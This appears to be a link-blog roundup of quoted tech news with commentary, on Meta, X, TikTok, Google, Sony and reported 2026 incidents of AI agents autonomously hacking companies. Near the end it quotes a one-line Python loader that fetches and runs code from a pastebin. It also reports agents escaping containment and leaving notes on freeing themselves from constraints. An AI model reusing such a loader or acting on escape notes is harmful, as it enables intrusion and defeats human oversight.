Mark Zuckerberg, in a (much) longer version of an essay originally published last month in the opinion pages of the Wall Street Journal:

The defining questions of our age are who will have access to superintelligence and what will we direct it towards. Will it be centralized and restricted to a few institutions, or will it be a tool that empowers everyone?

We propose a philosophy based on individual empowerment as the source of prosperity, invention as the primary purpose of superintelligence, and balance of power as the foundation of safety.

The themes of this essay are reminiscent of those in the “Personal Superintelligence” one Zuckerberg published a year ago. It has the same aspirational messaging about empowering individuals with decentralized superintelligence, the same acknowledgement of the new risks of this technology, and the same total reluctance to define “superintelligence” in any meaningful sense. The term appears 55 times in his latest essay, not one of which explains what it actually is. I suppose it must be synonymous with generative A.I. but the beauty of a proprietary term like this one is in its flexibility.

This is a long — superlong, even — essay and there is much to cover. Others have explored its unsubstantiated predictions, its assumptions, its contradictions, its hypocrisies, and its shallowness.

What I would like to focus on are the specific references Zuckerberg makes to studies, initiatives, or plain anecdotes. Despite the word count, there are few concrete references; much of this is about visionary concepts, not grounded reality. Despite their paucity, Zuckerberg also provides no links or citations, making it particularly difficult to track down the source of claims like this one (emphasis mine):

People fear that automation will outpace individuals’ capability growth, leading to job displacement followed by a difficult period as people learn new jobs. But there is no rule that AI must increase automation faster than it increases individuals’ capabilities or demand for new skills. Recent statistics suggest it may be more likely that individuals’ capability growth could match or outpace automation, in which case people will gain the ability to do many new things before their current jobs change. This would lead to a healthy balance and potentially even job growth.

What this actually refers to I have no idea. There is enough hedging — “recent”, “suggest”, “may be”, “likely” — that it kind of means nothing at all. What I think Zuckerberg is saying in this paragraph is that people can learn new things faster than A.I. can take jobs, but I could not find “recent statistics” backing this up.

There are some relevant observations, though. A June research note (PDF) from the Stanford Digital Economy Lab found, using data from ADP payroll services, that automation-friendly entry-level positions saw employment declines since the November 2022 launch of ChatGPT. Meanwhile, a report published by PWC in June (PDF) suggested increasing wages and employment in jobs that could be automated, even at the entry level. One possible difference is in methodology; while Stanford’s information came from payroll data, PWC’s was from job ads. PWC’s findings were also highly sector-dependent, and indicate entry-level jobs now require more skills to compete with automation. I think PWC’s report is the closest match to what Zuckerberg is arguing, but it is difficult to know for sure. Also, how exactly are young people fresh out of school supposed to develop skills like “team building” and “stakeholder management” before they can be hired?

Here is another anecdote from Zuckerberg’s essay, this time about how Meta is committed to building its physical A.I. infrastructure to support “high-paying local jobs, investment in schools and public services, ensuring energy prices don’t rise, and taking care of the environment”:

For example, in Richland Parish, Louisiana, where Meta is building a large data center, teachers received a $50,000 bonus this year because of the increased tax revenue from our investment. The superintendent told us that teachers are now moving there from across the country and he believes it will become one of the nation’s best school districts.

This is true, but elides the reasons why teachers are somehow getting bonus cheques from a data centre construction project they have nothing to do with. Reporting about this for the New York Times, Jacey Fortin writes that this undeniably exciting windfall is due to a “decades-old ordinance that directs 1 percent of local sales tax revenue to educators”. However:

But many of the workers are likely to leave in the next few years, ending the tax boom. And the Meta payment, which amounted this year to about $22 million, represents only a fraction of the taxes that a company would normally pay to build in the area.

Meta’s tax bill should be over nine times the amount it actually pays, and it will drop precipitously when construction is complete. But Meta made backroom negotiations to get all kinds of concessions and incentives to build its enormous data centre in the region. If the tax breaks had not been implemented and Meta constructed the data centre anyway, it would raise enough money to cover the salaries of all Louisiana public school teachers for more than a year. Eli Tan and Maureen Farrell, also of the Times, noted one resident’s sixfold rent increase thanks to housing demand from construction crews, but quotes the state’s governor saying the tax revenue pre-Meta was “zero”.

Zuckerberg:

We help keep electricity prices low by building our own energy-generating infrastructure wherever we invest. This ensures that not only are we not consuming energy that could have gone to the local communities, but in some cases we even supply a surplus of low-cost energy back to the communities. We think this is an important investment principle for sustainability.

Meta has previously emphasized its sustainability bonafides, but Zuckerberg omits such discussion here, perhaps because it would require considerable caveats that could be a distraction from the essay’s marketing angle. In Louisiana, for example, Meta is paying $2.65 billion to build several power plants with Entergy, but the region still needs more power. So Entergy is looking to acquire a plant in Texas, which could increase customers’ rates. In El Paso, at a different data centre project, Meta is only contracted to cover power plant construction costs for one to five years, after which costs will be transferred to customers. Like in Louisiana, it is also gas-fired.

Closer to home, a gas-fired plant in Alberta will not come online until years after Meta’s to-be-built data centre is up and running, all while electricity rates are predicted to climb.

Zuckerberg:

Developing personal agents requires a new way of thinking about alignment. Most labs today view alignment as a defensive measure for enforcing a centralized set of values. For example, one leading model was aligned to refuse helping draft a letter to prospective parents at a school because it thought standardized testing was unethical.

If this is a real anecdote, I cannot find the source.

And, if you can believe it, those are all the specific and checkable claims Zuckerberg makes in this essay. The rest of it is strikingly like one of those Microsoft concept videos from a decade ago albeit without the After Effects artist expense. One last thing, though, from Zuckerberg:

Privacy is an important foundation for individual empowerment and freedom. […]

Meta continues to make virtually all of its income from advertising targeted by some of the most privacy hostile technologies ever created. While “superintelligence” appears over fifty times in this essay, the words “ads”, “advertising”, and “advertisement” go unmentioned. They appear not even once.

Vass Bednar, the Walrus:

[…] the point has been made: looking after the information economy can no longer be a side project for underfunded institutions. Wikipedia is as miraculous as the Wayback Machine is indispensable. Still, we need to stop pretending volunteerism alone can hold up the public internet. We understand this duty more clearly in other domains. After all, roads aren’t governed by ride-sharing companies; payment apps don’t set monetary policy; cloud service providers don’t dictate national security frameworks (at least not yet). Yet we have been shockingly casual about governing our digital dependencies.

This paragraph is fantastic. But one of the things I found frustrating about this article as a whole is the lack of links or substantial proof. For example, I felt compelled to fact-check this claim:

The retrieval crisis has reached even Wikipedia, one of the world’s most significant volunteer-run public knowledge resources. For years, search engines sent billions of viewers to its pages. But now, AI systems scrape and ingest Wikipedia’s content directly when presenting their results, eliminating the need for users to click through. Wikipedia has become the infrastructure of its own demise: dwindling traffic means attention and donations no longer reliably flow back to the encyclopedia to keep it alive.

On a gut level, this feels like it should be true. An initial glance at the views of English Wikipedia’s main page, however, suggested it was not. But then I looked at total pageviews across English Wikipedia since January 2020 — as far back as it goes — and, indeed, page view have dropped from 7–8 billion per month in early 2024 — before Google launched A.I. Overviews — to 6–7 billion per month in 2026. Perhaps it is simply not this writer’s style, but I would prefer to have had concrete numbers to reference.

Sarah Perez, in a TechCrunch story about monthly active user numbers for Bluesky, Threads, and X, using data provided by Similarweb:

Instead, the data shows that X’s worldwide monthly active users on mobile were down around 3% year-over-year in June, and X’s mobile daily active users dropped 7% in July to 123.7 million. (Of course, X remains a sizable social network with around 302 million monthly active users on its app as of June 2026 and a growing number of web visits, up 5.3% year-over-year in July to 4.7 billion.)

Similarweb’s data is janky as hell, and this number is a long, long way from SpaceX’s self-reported monthly active user count of 550 million on X alone. I am not saying either number is reliable, only that a gulf of 248 million users is an error not easily explained by rounding or estimation assumptions. Pre-takeover, Twitter had about 338 million monthly active users, according to an estimate by Insider Intelligence; in four years, the platform either declined by around 36 million monthly users or grew by over 200 million.

By the way, how is X doing from a financial perspective?

Mike Masnick, Techdirt:

Let’s break all this down: In the second quarter of 2022, the last full quarter before Elon took over, Twitter brought in $1.08 billion in ad revenue. In the second quarter of 2026, X brought in $367 million. That’s $713 million a quarter, gone. Elon has wiped out two-thirds of Twitter’s ad business over the exact period in which he promised investors he’d nearly triple it.

Musk said in his 2022 Twitter investor pitch that he would quintuple revenue by 2028, though advertising would represent just 45% of that for a total of $12 billion annually. But, then again, Musk says a lot of things that are not true, like how his heart goes out to you.

Katie Baker, the Ringer:

Look, there’s maybe nothing less cool than waxing nostalgic about Google of all things. It’s like mourning the Astor Place Starbucks (or getting sentimental about any Blockbuster Video — although most people aren’t ready for that conversation). But I don’t think I’m really missing Google Search as much as I’m missing the days when it was mining more fertile and open ground.

As Baker writes, it is not simply the effect of declining Google traffic on publishers that is concerning. It is also the effect A.I. tools and features — including those from Google itself — are having on the web at large. Many websites have attempted to restrict traffic from scrapers and automated services, a side effect of which is that they become more difficult to use for people, and less findable through advanced search queries like the site: operator.

It is hard to reckon with the notion that Google was only incidentally a utility. It worked so well for so long and for so many different audiences that it now seems positively quaint to think of a time when I could use it for deep research into other stuff. It still is the best we have simply because of its longevity: there is no competitor with a usable index dating back to the 1990s. (Bing’s date picker, for example, was designed by someone who hates you, your family, and your friends.) But Google has abused the trust of publishers so thoroughly that it has effectively sabotaged its most specialized and helpful use cases. It is a shame.

Phaedra Haywood, the Santa Fe New Mexican:

A state district judge in Santa Fe on Thursday ordered social media giant Meta Platforms Inc. to pay $567 million into an abatement fund to address public harm to New Mexico children and teens.

Judge Bryan Biedscheid’s ruling resolves the second of a two-part civil proceeding in a landmark case filed in 2023 by New Mexico Attorney General Raúl Torrez, who argued Meta’s social media platforms have led to a youth mental health crisis in the state and have exposed kids to exploitation by sexual predators.

This is in addition to a $375 million penalty issued by a jury in March.

The judge’s orders are worth reading, I think, because they show the careful reasoning that guided the state’s new requirements of Meta. People like Eric Goldman and Techdirt’s Mike Masnick who worried that Section 230 of the Communications Decency Act would be fundamentally undermined by the verdict of this case might be pleased. For example, the judge declined to mandate changes to “features designed to maximize screen time, such as autoplay videos [and] infinite scroll” because it would risk “running afoul of the First Amendment and Section 230 because of the direct effect those features have on content presentation”. If features like those — or algorithmic recommendations, about which the state’s proposed changes “are vague and aspirational” — are to be altered, it is something this judge punted to the two other branches of U.S. government.

Similarly, the judge declined the state’s proposal to restrict or eliminate end-to-end encryption in Instagram messages. In part, that is because Meta already removed the feature in March. But it is also because the evidence did not point to end-to-end encryption being of particular concern (paragraph 149):

Fundamentally, regarding sextortion, grooming and other exploitative activities, it is the algorithmically recommended connections of adults and adolescents that creates the most significant harm.

To that end, the judge says children’s accounts must not be recommended to adult users (paragraph 143), something Meta apparently does not already do.

Meta must make many other changes to the way it handles accounts belonging to children, including this curious restriction (paragraph 170):

Meta shall implement a mandatory usage time limit for accounts belonging to users under 18 years of age. Meta shall restrict the usage of all such users to not more than 90 hours of use per month cumulatively across Facebook and Instagram.

However, because of the Children’s Online Privacy Protection Act of 1998, the judge cannot order that Meta “request children to submit personal data or be passively tracked online, even for age-verification purposes”. Therefore, all of these age-based limitations will be based on estimations or information derived from other interactions.

Many of the most damning statements in this decision are quotes from internal Meta research, and the company could have made lots of positive changes itself. Instead, it exploited its own findings. A May 2020 presentation, for example, “explicitly connected notifications to time spent: a graphic included in the presentation shows the phrase ‘Fewer Notifications,’ which is then followed by an arrow pointing to ‘Fewer Sessions,’ which is followed by an arrow pointing to ‘Less Time Spent.'” while a presentation from June 2023 found “[p]erceived life interference from app use is highest for younger users”. Now that it has been forced to react by this court, it suggested a bunch of stuff it could do, which often agreed with its recommendations: limiting push notifications during school hours and at night, removing like counts, comparing itself to a polluting factory, and so on. Meta and its peers cannot and will not self-govern, even when they have the research. I have low expectations these changes will be rolled out to child users worldwide.

Mia Sato, the Verge:

When web traffic is funneled through LLMs instead of a traditional search results page, as Google has been doing, being cited by a chatbot becomes ever more important. Now, a whole host of startups, brands, and agencies are coming to Reddit to try to promote their companies in hopes that they will get picked up by AI. In an effort to try to manipulate LLM responses and stuff AI search results with brand-friendly answers, marketers have descended upon Reddit, a pseudo-anonymous platform that users have come to associate with authenticity and unfiltered, truthful opinions.

Marketers and search optimization specialists have been doing this kind of thing for years but, as Sato explains, their strategies have become more surreptitious in recent years. Because they are no longer as singularly focused as juicing the ranking position of a client’s website in search results, they no longer need to include links or other common tells of search marketing spam. They merely need to mention the brand name in a positive context — a lot — with the hope of influencing what A.I. search will regurgitate.

I have noticed this kind of thing on Wikipedia, too. According to a presentation given last year by NP Digital, the search optimization company run by Neil Patel, Wikipedia.com [sic] is the second most commonly cited domain in Google’s A.I. Overviews. In a different presentation, this one from December 2024, NP Digital “highly recommend[s]” treating Wikipedia as a marketing opportunity. I stumbled across a result of their work recently when I was reading the article for James Hoffmann. There are two mentions of Bellwether Coffee that seemed out of place and, when I checked the page’s revisions, saw that they had been made by an employee of NP Digital to promote Bellwether. The employee tried creating a page for the company, too, but it was deleted, but the company still has those critical brand name mentions on one of the world’s most visited web domains.

Sato interviewed Mike Moschella, director of analytics at marketing firm DKC, about the wisdom of the crowds at Reddit and Wikipedia:

“The starting point of all business analytics is this idea that you can have a better price, you have better service, or you can have better quality, but you can’t have all three,” Moschella says. “If you say [your company’s stock] is the best stock ever in the universe, you can issue that press release a million times, but WallStreetBets [the subreddit] isn’t going to buy it if the fundamentals don’t agree.” Reddit should force brands to be more “honest and authentic,” Moschella says — at least in an ideal world.

Remind me again: the users of which website succumbed to mass hysteria based on a conspiracy theory about mall video game retailer GameStop and, subsequently, applied the same formula to Bed, Bath & Beyond? Top minds, I tell you.

Sally Sax, writing for the Association of Research Libraries:

Twenty-five years after the US copyright office’s first DMCA review, libraries operate in an increasingly non-competitive digital information environment. A lack of digital ownership rights remains a critical barrier to libraries serving their missions as memory institutions. The closest libraries can get to ownership of commercial digital content is a perpetual access license (PAL), and the marketplace may be deciding that PALs are no longer viable from its perspective. […]

If libraries are restricted from keeping working copies of digital media due to software restrictions, prohibitive costs, and legal concerns, people are going to look back a hundred or more years from now and wonder why we decided we no longer wanted to keep a cultural record. But for a beautiful moment in time, we created a lot of value for shareholders.

Lorenzo Franceschi-Bicchierai and Zack Whittaker, TechCrunch:

Under current U.S. hacking laws, a human can face criminal charges for breaking into someone else’s computer without permission. But when an AI agent autonomously hacks into a company’s computers, determining who is liable is much murkier.

The surprise admissions by OpenAI and Anthropic that their unreleased AI models autonomously hacked into several companies have upended our understanding of America’s computer hacking laws, prompting discussions over whether the companies could face legal reprisals.

You can add Meta to the list of companies that have done some light digital breaking-and-entering because they insufficiently secured an A.I. model. In any case, I am fascinated by the seemingly pervasive idea that obviously illegal things somehow become a grey area when a highly-valued A.I. company is responsible. Corporations now allegedly authorize mass piracy at the highest levels and use illicit movie rips as though it is just another day.

Robb Knight:

I’m shutting down EchoFeed within the next 12 months when the final subscriptions expire. It will continue to run as it is until then so if you’ve already paid you have access until the end of your subscription.

EchoFeed was launched just a couple of years ago and I have been using it ever since to automatically publish links to the latest posts on Bluesky and Mastodon. It has been a really good service — the kind of thing I happily paid for and, in the best way, would forget about.

But the reasons Knight gives for shutting it down are completely understandable. Trying to manage this kind of service with, say, hundreds of normal users would probably be challenging; with lots of abusive users, too, it sounds like a nightmare.

If you know of a similar service, please let me know.

Emily Steel, New York Times (gift link):

More than 4,000 lawsuits have been filed, so many that thousands were combined to streamline procedural matters. Most remain in the early stages. The New York Times reviewed documents from the three cases that reached trial and about a dozen others that have advanced to the stage when the parties start exchanging documents and conducting depositions.

The litigation has revealed a clear pattern: Uber’s lawyers scour women’s private communications, medical records, therapy notes and other sources for sensitive details, including other sexual assaults, childhood abuse and domestic violence. They grill the women about those issues, their sex lives and their behavior on the night of the incident.

If Uber’s defence counsel wants to look at any history, it should be that of the company they represent.

There is a brief exploration in this article about why victims and their family members, therapists, and friends are deposed in these cases. In short, these are civil lawsuits that, per Steel, are filed by people “seeking compensation for pain and suffering”, thereby giving Uber great latitude in its defence. This is more limited in criminal trials. Perhaps my true frustration here is with a justice system that leaves sexual assault victims with few options that treat them with dignity and provide a chance at closure.

In 2023, Bloomberg Businessweek asked TikTok for comment as it reported out a story about users who were recommended videos about self-harm and suicide, particularly teenagers like Chase Nasca. It is a difficult read. As a result of this press outreach, TikTok analyzed Nasca’s account and why he was given so much of this material that it likely played a role when he took his own life at just sixteen years old.

Olivia Carville, of Bloomberg Businessweek, recently obtained that internal report:

Chase’s account was stuck in a so-called filter bubble, an online echo chamber that pumped out repetitive content the algorithm predicted he’d want to watch. There he received an “onslaught” of suicide and self-harm content, according to the document. Because Chase was in the control group, it says, “TikTok’s filter bubble prevention strategies did not take effect on this user by design.”

Those two words, “by design,” carry extra weight against the backdrop of litigation over social media addiction that’s playing out in US courts. The crux of the legal argument being wielded against the world’s biggest social media platforms is that their products are dangerous by design. The companies, including TikTok, vehemently deny this and point to safety features they’ve introduced to protect users. But the document shows TikTok intentionally withheld a safety feature from millions of people, and why.

The “why” is simple: TikTok made a change to its recommendations system and wanted to see how it performed. TikTok rolled out this change to 90% of its users but kept 10% as a control group; Nasca’s account was in that group.

That split is odd to me — when Google experiments with new features, it first tries them with a “small” and “narrow” group, only expanding them later. Trying a new feature with nearly every user suggests to me that TikTok had a hunch this was a promising enhancement and it only needed to keep a small number as validation. In the report obtained by Carville, one consideration was “the ability to measure impact on [daily active users] and core metrics”, which suggests an alarming followup question: if a better-moderated feed hurt these metrics, would TikTok have considered rolling it back?

A steelmanned argument in TikTok’s favour is that such metrics are only one consideration in adjusting recommendations, and that depressive material was probably still seen by users who were using the newer system. And, yeah, those two things may be true, but the simple fact is that TikTok differed its recommendations system for different users, and one of them was fed an obsessive number of similar videos advocating suicide. That is a choice the company made about what videos would be seen by which users. TikTok has agency, and it should have responsibility.

Ethan Gach, Kotaku:

It’s been almost a month since Sony announced the end of PlayStation discs for new games starting in 2028, and a loud contingent of angry fans has continued to criticize the company for going all-digital. Asked about the ongoing backlash during its latest earnings call, Sony said it understands why people have strong feelings about physical games, but it’s still going to move forward with getting rid of them.

“There are various reasons we made this decision, the biggest being that the digitalization of content overall has been progressing, that’s the big factor,” Sony chief financial officer Lin Tao said through an interpreter during a Q&A on July 31. “It’s not just for PlayStation, but for all kinds of content, digitalization is progressing.”

Via Timothy Geigner, at Techdirt:

No concern for preservation efforts. No concern for the 20% or so customers who still want to buy physical media. No concern for any brick and mortar retail partners and what will happen to them.

It appears Sony is going to listen to anyone but its own customers on this one.

In pure market forces terms, Sony is arguably listening to the overwhelming majority of its customers by moving to a digital-only distribution strategy. Most people will not notice, at least in the short-term, that they can only acquire new games through downloading them and agreeing to some onerous digital rights restrictions. None of that matters until Sony has more licensing disagreements or shuts off some servers. But then it will matter.

We need government agencies that actually take seriously these kinds of power transfers and advocate for consumer rights. There should at least be a time-based limit to how long DRM can protect something, after which it should be possible to keep a wholly local copy to the greatest possible extent.

Tim Bradshaw, Financial Times:

Apple has launched a new legal challenge against the UK’s latest attempt to create a “backdoor” to access encrypted customer data, a year after the Home Office agreed to drop a previous order after a row with Washington.

As a reminder, this is different from the order made in February last year that would have demanded Apple create a backdoor to encrypted iCloud data globally. The current order reportedly applies just in the U.K., so this is effectively a domestic issue there. But because the orders and hearings are so secretive — the Home Office did not even want their existence shown on the calendar — few external parties know exactly what those demands are. Britons have to trust their government’s intentions, and the rest of the world has to assume it does not apply to their data.

Apple has not again made Advanced Data Protection available to U.K. iCloud users.

Deepa Seetharaman and Raphael Satter, Reuters:

OpenAI has discovered other instances in which autonomous agents have escaped ​containment as the company expands its investigation of the hacking incident at tech firm Hugging Face that drew global attention this month, two people familiar with the matter said on Friday.

Not satisfied with just a couple of agents being left unattended and spiralling into security nightmares, OpenAI will have more to acknowledge. Stay tuned, I guess, for the company’s full report.

“We have a whole industry where the people designing, developing and putting out these tools aren’t keeping up themselves to responsibly develop these things and keep them ​safe,” said Maurice Chiodo, a mathematician who works at Cambridge University’s Centre for the Study of Existential Risk.

Extraordinary — and the world is at the mercy of U.S. regulators who are so paralyzed by competition with China they are reluctant to do anything that would slow these companies down.

Ashley Belanger, Ars Technica:

According to [Judge] Engelmayer, it would be impractical to expect partners to update licensing deals every time a company rolls out new security methods. Additionally, Engelmayer found that “the Google Decision is not to the contrary” of Reddit’s case because, unlike Google, Reddit went “beyond the bare allegation” that Google used to broadly claim that it generally “has licenses to display copyrighted content.” Instead, Reddit argued that its licensing agreement with Google directly prohibits certain uses of Reddit data that are now being accessed due to the circumvention methods employed by malicious web scrapers.

Really interesting to read this reasoning (PDF) back-to-back with that of the other SerpApi case. If I — a non-lawyer — am reading this right, it seems that scraping Google results may not be inherently wrong, but may not be legal to use any scraped data also bound by a licensing agreement.

Anthropic’s “Frontier Red Team”:

After reviewing 141,006 evaluation runs where Claude could have obtained internet access, we identified three incidents in which a model accessed the internet from within or while interacting with the evaluation environment of Irregular, one of our third-party evaluation partners, and then gained unauthorized access to the production infrastructure of three different organizations.

I do not think A.I. companies are disclosing these security breaches for cynical marketing reasons — a position that is somewhat awkward now that OpenAI said it had two models which autonomously exploited vulnerabilities, and then Anthropic follows that up by saying it had three: “Opus 4.7, Mythos 5, and an internal research test model”. Maybe another company is about to disclose they had, say, five models exploiting security vulnerabilities.

As with the OpenAI incident, the guardrails around Anthropic’s models were lowered and there were key misconfigurations in these evaluations. Nevertheless, these incidents represent real problems software vendors should begin taking seriously. Everything is now happening at barely comprehensible speeds at unprecedented volume.

Google Earth project manager Bryan Horowitz:

For the first time, you can generate custom images using Google Earth’s satellite, aerial, and 3D imagery alongside Nano Banana, which creates concepts grounded in the real world. Just zoom in to a place in Google Earth on web, tap “create image,” and type whatever you want to see.

Henk van Ess, Digital Digging:

Google built that reference and it is not a small thing. Street View passed 10 million miles of road in 2019. It now holds more than 280 billion images across over 110 countries. Google Earth turned twenty this year. Between them they are a photographic record of the physical world, and — this is the part that matters — every frame of it is dated.

Dated is the whole trick. If you know when the picture was taken, you can prove when something appeared.

Anyone could take a screenshot and modify it using A.I. tools somewhere else — sure. Van Ess documents an example of this very thing happening when, last year, an X user created an image of a supposed drone strike taking out a U.S. base in Bahrain. However, that is at least a little bit more difficult than it is when it is built into Google Earth.

These are reference tools, and the de facto standard in many industries. The images might not become embedded into the map. But Google is centring its ability to create fraudulent images. And why? Might as well have the Oxford University Press build a novel word generator into its online dictionary.

Update: Google says it has pulled this feature “while we work on implementing stronger guardrails”, which is disappointing since it should not exist at all. Not everything needs an A.I. feature. Let maps be maps.

Emily Bass:

A senior US State Department official displayed a map of Africa that was completely wrong before high-level officials from African nations, including some whose countries had been mislabelled. The map mishap occurred during a presentation at “Transforming health assistance: Implementing U.S. government MOUs for sustainable HIV programs,” a pre-conference event at the largest AIDS conference in the world, held this year in Rio de Janeiro.

Just an incredibly bad use of a map in at least two ways: none of the named countries are correctly highlighted on the map, and a few of the labelling lines do not correctly correspond to the regions they are supposed to identify — which, again, are incorrect.

Jessica Donati, Reuters:

A Reuters analysis found the ​image of the map included in the presentation contained an artificial intelligence watermark that signals it was made with OpenAI tools. The company said it was investigating the report.

Shocking nobody.

OpenAI last week:

Last week, Hugging Face disclosed a new kind of security incident after they detected and contained an AI agent that compromised their infrastructure, something we expect to become more commonplace with the proliferation of increasingly cyber-capable models. After investigating, we now know that this particular incident was driven by a combination of OpenAI models — including GPT‑5.6 Sol and an even more capable pre-release model, all with reduced cyber refusals for evaluation purposes — while being internally tested on a benchmark of cyber capabilities.

It is so hard to take this industry seriously when a key player is named “Hugging Face”. Anyway, that site published a technical post-mortem of the attack:

Over roughly two and a half days inside our infrastructure, an autonomous AI agent driven by a combination of OpenAI models ran an end-to-end intrusion against our platform: it was thousands of small, automated decisions, executed at machine speed across short-lived sandbox environments, with command-and-control staged on ordinary public web services.

[…]

Our forensic reconstruction covers ~17,600 attacker actions that we were able to recover, grouped into ~6,280 clusters, between 2026-07-09 02:28 UTC and 2026-07-13 14:14 UTC.

Being skeptical of news like this is a good thing, but a good skeptic follows the evidence and 🤗 appears to have provided plenty. It really does seem like OpenAI models caused a severe breach with limited human involvement.

Casey Newton is, for some reason, quite bothered by a handful of Bluesky users’ responses to a post he made about one of the weirder things the A.I. agent apparently did. According to a Reuters report, it “left notes apparently for future versions of itself” which “laid out instructions for how agents could free themselves from OpenAI’s internal constraints”. This appears to correlate with this part of Hugging Face’s report:

The final day was about durability and cleanup. The agent:

  • Established a second-stage remote loader that re-fetched and executed code from a pastebin on every submission, so each new code-submission sandbox re-armed itself:

    from urllib.request import urlopen

    exec(urlopen("https://pastebin.service/[REDACTED]").read())

But it is weird that Newton is so hung up on the Bluesky crowd. To be clear, all of the users he is mad at are pseudonymous, and none are experts in the field. Yet he made “A.I. denialism” on the platform the hook for this article. It is a fascinating look at someone who spends way too much time online.

Newton’s article has some substance, though:

But it can be true both that AI labs are responsible for the behavior of their models and that frontier models are not fully under the control of their makers. The Hugging Face attack is important because it demonstrates both things at the same time. OpenAI essentially left its models unattended for days on end, and they broke into another company. Not because they were programmed to, as another Bluesky user told me — but because they are trained to achieve objectives, and are going to increasingly great lengths to achieve them.

This attack is worth taking seriously. I am far from A.I.-brained, but none of what is being documented requires “artificial general intelligence” — however you define that. It is technically sophisticated, absolutely, yet the writeup posted by Hugging Face is cogent and reflects common techniques used for malware.

I sympathize with those who find it hard to believe any of this stuff, though. The biggest boosters in this industry are writing stuff like “imagine everyone has a superintelligent lawyer. Justice would be carried out much more fairly and efficiently than it is today” in national newspapers of record. Imagine if any of the people who have all this power met it with a corresponding degree of responsibility.

Update: Karl Bode:

This was technically the world’s first fully autonomous AI hack, and an important milestone in what’s quickly becoming a brave new world of automated cat and mouse cybersecurity where sophisticated layers of software automation engage in endless combat across the entirety of global networks at lightning speed.

At the same time, this is all still within the confines of the known – as in it’s just human beings using and abusing software for good or ill (see: viruses), albeit at new scale and speed. We have not, I’m happy to report, created a malevolent god.

One expects churnalism from outlets like Business Insider and Futurism, but the Associated Press and New York Times are often just as guilty. They need to do better. For all media’s shortcomings and outright failures, we desperately need these outlets to work to a higher standard.

If you have read Byron Tau’s reporting, including his book “Means of Control”, you might be familiar with Mike Yeagley. He was the one who made the U.S. military and intelligence community aware of the surveillance they could conduct through digital advertising placements and the open data market.

Joseph Cox of 404 Media recently interviewed Yeagley about, in particular, Grindr and why the U.S. government intervened to force its Chinese owner to divest. The audio version is fine, but there is a video on YouTube if you want to look at Yeagley’s forehead. It is a truly good interview and worth your time.

However, Yeagley is in an awkward position of self-interest. As mentioned, he says he was — and he is often reported to be — the first person to bring the U.S. government this strategy for using advertising data as a surveillance mechanism. He is also on the board of Unplugged, which relaunched last year with a new phone. It claims to be a hardened and ultra-private device; the box contains a copy of the U.S. Constitution “to remind you of your fundamental rights”. No word on if they have finally snagged Glenn Greenwald to serve as spokesperson.